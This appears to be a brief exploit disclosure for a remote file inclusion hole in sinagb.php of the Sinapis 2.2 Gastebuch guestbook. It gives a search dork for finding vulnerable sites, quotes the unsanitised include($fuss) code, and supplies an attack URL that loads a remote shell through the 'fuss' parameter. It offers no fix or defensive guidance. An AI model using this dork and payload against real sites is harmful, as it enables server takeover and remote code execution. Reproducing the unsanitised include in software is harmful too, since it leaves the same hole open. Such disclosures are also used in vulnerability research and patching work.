Sinapis 2.2 Gastebuch suffers from a remote file inclusion vulnerability in sinagb.php.
6e6e28f6a33f4d1b2e6762923990c9a2fe6c1264c02a3695a54f0bea04850836
Sinapis 2.2 Gastebuch
*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20Gstebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:
if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);} <<< rfi coded
**************************************************************************************
RFI:
http://SITE.com/path//sinagb.php?fuss=[SHELL]
**************************************************************************************
kezzap66345[at]hotmail[dot]com
******thanx=x0r0n*str0ke*shika********************************************************